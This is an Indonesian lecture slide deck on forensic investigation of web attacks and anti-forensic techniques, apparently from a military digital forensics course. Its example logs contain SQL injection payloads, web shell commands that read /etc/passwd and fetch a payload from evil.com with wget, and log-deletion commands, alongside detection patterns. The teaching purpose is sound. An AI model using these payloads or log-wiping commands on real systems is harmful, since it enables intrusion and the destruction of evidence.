Forensik Digital

Pertemuan 12

Investigasi Serangan Web dan Teknik Anti-Forensik

Mata Kuliah: Digital Forensic for Military Purposes | 3 SKS

๐ŸŽฏ Capaian Pembelajaran

Setelah pertemuan ini, mahasiswa mampu:

  1. Mengidentifikasi jenis serangan web dan vektor serangannya
  2. Menganalisis log web server untuk mendeteksi serangan
  3. Melakukan investigasi SQL Injection, XSS, dan CSRF
  4. Menjelaskan teknik anti-forensik penyerang
  5. Mendeteksi timestamp manipulation dan log tampering
  6. Menganalisis steganografi dan data hiding
  7. Menerapkan forensic countermeasures

๐Ÿ“‹ Agenda Hari Ini

Bagian 1: Serangan Web

  • Arsitektur Aplikasi Web
  • Format Log Web Server
  • SQL Injection
  • XSS dan CSRF
  • Web Shell Detection

Bagian 2: Anti-Forensik

  • Klasifikasi Anti-Forensik
  • Steganografi
  • Alternate Data Streams
  • Timestamp Manipulation
  • Log Tampering

๐ŸŒ Arsitektur Aplikasi Web

LapisanKomponenArtefak Forensik
PresentationBrowser, HTML/CSS/JSCache, cookies, history
ApplicationWeb server, app logicAccess logs, error logs
DataDatabase serverQuery logs, audit trails

Serangan web melintasi beberapa lapisan โ€” korelasi artefak antar lapisan diperlukan

๐Ÿ–ฅ๏ธ Web Server Utama

Apache
Log: /var/log/apache2/
Nginx
Log: /var/log/nginx/
Microsoft IIS
Log: C:\inetpub\logs\
๐Ÿ’ก Tips
Selalu hash log SEBELUM analisis!

๐Ÿ“ Apache Combined Log Format

192.168.1.100 - admin [15/Jan/2025:10:23:45 +0700] "GET /admin/dashboard.php HTTP/1.1" 200 4523 "http://example.com/login" "Mozilla/5.0"
FieldNilaiKeterangan
IP192.168.1.100Alamat client
Timestamp[15/Jan/2025:10:23:45]Waktu request
RequestGET /admin/dashboard.phpMethod + URI
Status200Response code
User-AgentMozilla/5.0...Info browser

๐Ÿ“Š HTTP Status Code untuk Forensik

CodeArtiRelevansi
200OKSerangan mungkin sukses
401UnauthorizedGagal autentikasi
403ForbiddenAkses ditolak
404Not FoundScanning/probing
500Server ErrorSQLi error-based

๐Ÿ’‰ SQL Injection (SQLi)

SQL Injection adalah teknik menyisipkan perintah SQL berbahaya melalui input aplikasi web ke database.
  • ๐Ÿ”“ Kebocoran data sensitif
  • โœ๏ธ Manipulasi data
  • ๐Ÿ–ฅ๏ธ Pengambilalihan server
  • โš ๏ธ Peringkat atas OWASP Top 10

Jenis SQL Injection

JenisTeknikDeteksi
In-BandUNION-based, Error-basedPayload di URL
BlindBoolean, Time-basedRequest berulang
Out-of-BandDNS/HTTP lookupSulit dari log web

๐Ÿ” Deteksi SQLi pada Log

grep -iE "(union.*select|or.*1.*=.*1|\
  select.*from|drop.*table|waitfor.*delay)" \
  /var/log/apache2/access.log
# Pola yang dicari:
/page.php?id=1' OR '1'='1
/page.php?id=1 UNION SELECT username,password FROM users--
/page.php?id=1; WAITFOR DELAY '0:0:5'--

User-Agent sqlmap = strong indicator serangan otomatis

๐ŸŽ–๏ธ Skenario: SQLi Sistem Logistik Kodam

172.16.0.100 [08:15:22] "GET /inventory.php?item_id=1' UNION SELECT username,password,NULL FROM admin_users--" 200
172.16.0.100 [08:15:25] "GET /inventory.php?item_id=1' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--" 200
172.16.0.100 [08:16:01] "GET /inventory.php?item_id=1' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='classified_ops'--" 200
Analisis: Enumerasi sistematis dalam 39 detik โ€” kredensial โ†’ daftar tabel โ†’ tabel operasi rahasia

๐Ÿ“œ Cross-Site Scripting (XSS)

XSS menyisipkan skrip berbahaya ke halaman web yang dieksekusi browser pengguna lain.
JenisMekanismePersistensi
ReflectedPayload di URLTidak persisten
StoredPayload di databasePersisten
DOM-basedProses client-sideTidak persisten
grep -iE "(<script|javascript:|onerror=|\
  eval\(|document\.cookie)" access.log

๐Ÿ”„ Cross-Site Request Forgery (CSRF)

CSRF memaksa pengguna terautentikasi mengirim request tanpa sepengetahuannya. 
192.168.1.50 - admin [12/Feb:11:30:45] "POST /admin/change_password HTTP/1.1" 302 0 "http://evil-site.com/csrf.html"

๐Ÿšจ Red flag: Referer dari domain eksternal pada request POST ke endpoint sensitif!

๐Ÿš Web Shell Detection

Web Shell = skrip berbahaya yang diunggah untuk akses remote ke server. 
# Cari file PHP dengan fungsi berbahaya
grep -rl "eval\|system\|exec\|passthru" \
  /var/www/html/ --include="*.php"

# File baru (7 hari terakhir)
find /var/www/html/ -name "*.php" -mtime -7

# File PHP di direktori upload
find /var/www/html/uploads/ -name "*.php"

๐Ÿ“‹ Log Aktivitas Web Shell

203.0.113.99 [03:15:22] "GET /uploads/x.php?cmd=whoami" 200
203.0.113.99 [03:15:30] "GET /uploads/x.php?cmd=cat+/etc/passwd" 200
203.0.113.99 [03:16:01] "GET /uploads/x.php?cmd=wget+http://evil.com/bd+-O+/tmp/bd" 200
  1. whoami โ†’ Identifikasi user server
  2. cat /etc/passwd โ†’ Enumerasi user
  3. wget โ†’ Download malware tambahan
KRITIS: Remote code execution + post-exploitation aktif!

๐Ÿ› ๏ธ Tools Analisis Log

# Top 20 IP
awk '{print $1}' access.log | sort | uniq -c | sort -rn | head -20

# Distribusi status code
awk '{print $9}' access.log | sort | uniq -c | sort -rn

# Request error 500
awk '$9 == 500' access.log

# User-Agent analysis
awk -F'"' '{print $6}' access.log | sort | uniq -c | sort -rn

โš”๏ธ Bagian 2

Teknik Anti-Forensik

Memahami cara penyerang menghindari deteksi

๐Ÿ›ก๏ธ Apa itu Anti-Forensik?

Anti-Forensik adalah teknik untuk menghindari, menghalangi, atau menyesatkan proses investigasi forensik digital.
KategoriTeknikTujuan
Data HidingSteganografi, ADS, enkripsiMenyembunyikan data
Artifact WipingSecure delete, log cleaningMenghapus jejak
Trail ObfuscationTimestomping, spoofingMenyesatkan investigasi
Attacks on ToolsExploit forensic toolsGagalkan proses forensik

๐Ÿ–ผ๏ธ Steganografi

Steganografi menyembunyikan informasi rahasia di dalam media yang tampak normal (gambar, audio, video).
AspekSteganografiKriptografi
TujuanSembunyikan keberadaanLindungi isi pesan
VisibilitasTidak terlihat adaTerlihat tapi tak terbaca
KecurigaanTidak mencurigakanMencurigakan

๐Ÿ”ฌ LSB Substitution

Mengganti bit terakhir piksel gambar dengan bit pesan:

Piksel asli:      10110100 11001010 01110001
Bit pesan:         1        0        1
Piksel modifikasi: 10110101 11001010 01110001
                        ^
                   Bit terakhir berubah

Perubahan hanya 1/256 per channel warna โ€” tidak terlihat mata manusia

๐Ÿ”ง Tools Deteksi Steganografi

ToolFungsi
StegSolveAnalisis visual layer gambar
zstegDeteksi steg pada PNG/BMP
steghideExtract data dari JPEG/BMP
stegseekBrute-force password steghide
binwalkDeteksi file tersembunyi
exiftoolAnalisis metadata

๐Ÿ’ป Perintah Deteksi Steganografi

# Deteksi dengan zsteg
zsteg suspicious_image.png

# Extract dengan steghide
steghide extract -sf image.jpg -p ""

# Brute-force password
stegseek image.jpg wordlist.txt

# Cek file tersembunyi
binwalk -e suspicious.png

# Cek metadata
exiftool suspicious.jpg

๐Ÿ“ Alternate Data Streams (ADS)

ADS = fitur NTFS yang menyimpan data tersembunyi di dalam file normal. Tidak terlihat di Windows Explorer. 
REM Membuat ADS
echo "Data rahasia" > dokumen.txt:rahasia.txt

REM Membaca ADS
more < dokumen.txt:rahasia.txt

REM Deteksi ADS
dir /R dokumen.txt
streams.exe -s C:\Users\suspect\
Get-Item dokumen.txt -Stream *

๐Ÿงน Artifact Wiping

MetodePassesStandar
Zero Fill1-
Random Data1-
DoD 5220.22-M3US DoD
Gutmann35Peter Gutmann
NIST 800-881-3NIST

๐Ÿ’ก Data yang di-wipe TIDAK dapat di-recover, tetapi penggunaan tool wiping itu sendiri meninggalkan jejak!

๐Ÿ”Ž Deteksi Wiping Tools

REM Cek Prefetch files
dir C:\Windows\Prefetch\*BLEACHBIT* /S
dir C:\Windows\Prefetch\*CCLEANER* /S
dir C:\Windows\Prefetch\*SDELETE* /S

REM Cek registry
reg query "HKLM\SOFTWARE\...\Uninstall" /s | findstr /i "bleachbit ccleaner eraser"

REM Cek event log (audit cleared)
wevtutil qe Security /q:"*[System[(EventID=1102)]]"

Artefak lain: USN Journal, Volume Shadow Copies, RAM artifacts

โฐ Timestamp Manipulation

Timestomping mengubah metadata waktu file untuk menyesatkan analisis timeline forensik.
Atribut MFTTimestampsModifikasi User?
$STANDARD_INFORMATIONC, M, A, Eโœ… Dapat dimanipulasi
$FILE_NAMEC, M, A, EโŒ Tidak bisa (kernel only)

๐Ÿ”‘ Key insight: Bandingkan kedua atribut โ€” jika berbeda = manipulasi!

๐Ÿ” Deteksi Timestamp Manipulation

AtributCreatedModified
$STANDARD_INFO2020-01-15 08:002020-01-15 08:00
$FILE_NAME2025-02-10 14:232025-02-10 14:23
Terdeteksi! $SI menunjukkan 2020, $FN menunjukkan 2025. Timestamp asli = $FILE_NAME (kernel-managed). 
# Deteksi dengan MFTECmd
MFTECmd.exe -f '$MFT' --csv output/ --csvf mft.csv

๐Ÿ“ Log Tampering

TeknikMetode
Deletionrm /var/log/auth.log
Selective Editsed -i '/IP_attacker/d' access.log
Log Rotation Abuselogrotate -f
Timestamp EditEdit langsung waktu entri
Log InjectionSisipkan entri palsu

๐Ÿ”Ž Deteksi Log Tampering

# Cek gap dalam timestamp
awk '{print $4}' access.log | sed 's/\[//' | \
  sort | uniq -c | sort -rn

# Cek ukuran file log
ls -la /var/log/apache2/

# Periksa inode modification time
stat /var/log/apache2/access.log

# Cek auditd untuk akses log
ausearch -f /var/log/apache2/access.log

# Bandingkan dengan remote log server

๐Ÿ›ก๏ธ Forensic Countermeasures

CountermeasureAnti-Forensik yang Dicegah
Centralized LoggingLog tampering
Write-Once MediaArtifact wiping
File Integrity MonitoringTimestamp manipulation
Forensic ReadinessSemua teknik
Memory AcquisitionEncryption, data hiding

๐Ÿ“ก Centralized Logging

# rsyslog - kirim log ke server terpusat
# /etc/rsyslog.d/50-remote.conf
*.* @@logserver.mil.id:514

# Apache remote logging
ErrorLog "| /usr/bin/logger -t apache_error -p local0.error"
CustomLog "| /usr/bin/logger -t apache_access -p local0.info" combined

๐Ÿ’ก Log di server terpusat tidak dapat dimanipulasi oleh penyerang yang hanya mengkompromikan web server

๐Ÿ“Š File Integrity Monitoring

# AIDE - Advanced Intrusion Detection Environment
aide --init
cp /var/lib/aide/aide.db.new /var/lib/aide/aide.db

# Periksa integritas
aide --check

# Output:
# Changed: /var/log/apache2/access.log
#   Mtime: 2025-02-15 10:00 -> 14:30
#   SHA256: abc123... -> def456...

Tools lain: Tripwire, OSSEC

๐Ÿ“‹ Studi Kasus: Serangan pada Kodam XVII

Skenario: Sistem logistik Kodam XVII/Cenderawasih melaporkan anomali 20 Feb 2025
  1. Lonjakan request dari IP 203.0.113.75 mulai 02:00 WIT
  2. File PHP baru di /uploads/
  3. Gap log antara 03:00-04:00 WIT
  4. File .xlsx dengan timestamp 2019

โฑ๏ธ Rekonstruksi Timeline

WaktuAktivitasJenis
02:01Akses halaman loginReconnaissance
02:05Login berhasilCredential compromise
02:10SQL Injection pada parameterSQL Injection
02:15Upload file ke serverWeb shell upload
03-04Gap pada log (dihapus)Log tampering
04:01Akses web shellPost-exploitation
Anti-forensik terdeteksi: log tampering + timestamp manipulation

๐Ÿ”Ÿ OWASP Top 10 & Forensik

RankKerentananArtefak Forensik
A01Broken Access ControlAccess log, session data
A03InjectionQuery logs, error logs
A07Auth FailuresAuth logs, brute force
A09Logging FailuresAbsence of logs!

โš ๏ธ A09 Logging Failures = anti-forensik paling efektif โ€” tanpa log, tidak ada bukti!

โ“ Quiz Interaktif

Dari log berikut, jenis serangan apa yang terjadi?

10.0.0.50 [14:05:33] "GET /users.php?id=1' OR '1'='1 HTTP/1.1" 200 8721 "-" "sqlmap/1.5"
A. Cross-Site Scripting (XSS)
B. SQL Injection
C. CSRF
D. Web Shell

โœ… B. Payload ' OR '1'='1 dan User-Agent sqlmap = SQL Injection

โ“ Quiz Interaktif 2

Teknik anti-forensik mana yang dapat dideteksi dengan membandingkan $STANDARD_INFORMATION dan $FILE_NAME?

A. Steganografi
B. Log Tampering
C. Timestamp Manipulation
D. Alternate Data Streams

โœ… C. $FILE_NAME dikelola kernel dan tidak bisa diubah user โ€” perbedaan = timestomping!

๐Ÿ“Œ Key Takeaways

  1. Log web server adalah bukti utama investigasi serangan web
  2. SQLi, XSS, CSRF memiliki pola unik yang terdeteksi di log
  3. Web shell = remote code execution โ€” severity KRITIS
  4. Anti-forensik: data hiding, wiping, trail obfuscation
  5. Bandingkan $SI vs $FN untuk deteksi timestomping
  6. Centralized logging = countermeasure paling efektif

๐Ÿ“… Pertemuan Berikutnya

Pertemuan 13: Forensik Dark Web dan Investigasi Email

  • Dark web investigation techniques
  • Tor network forensics
  • Email header analysis
  • Phishing investigation
  • Cryptocurrency forensics

๐Ÿ“š Referensi

  1. Casey, E. (2022). Digital Evidence and Computer Crime. Chapter 13
  2. Phillips, A., et al. (2022). Guide to Computer Forensics and Investigations. Chapter 10-11
  3. Harris, R. (2006). Arriving at an Anti-Forensics Consensus. DFRWS
  4. OWASP Web Security Testing Guide
  5. SecRepo: https://www.secrepo.com/
  6. CyberDefenders: https://cyberdefenders.org/

Terima Kasih

๐Ÿ” Forensik Digital untuk Keperluan Militer

Pertemuan 12: Investigasi Serangan Web dan Teknik Anti-Forensik


Ada pertanyaan?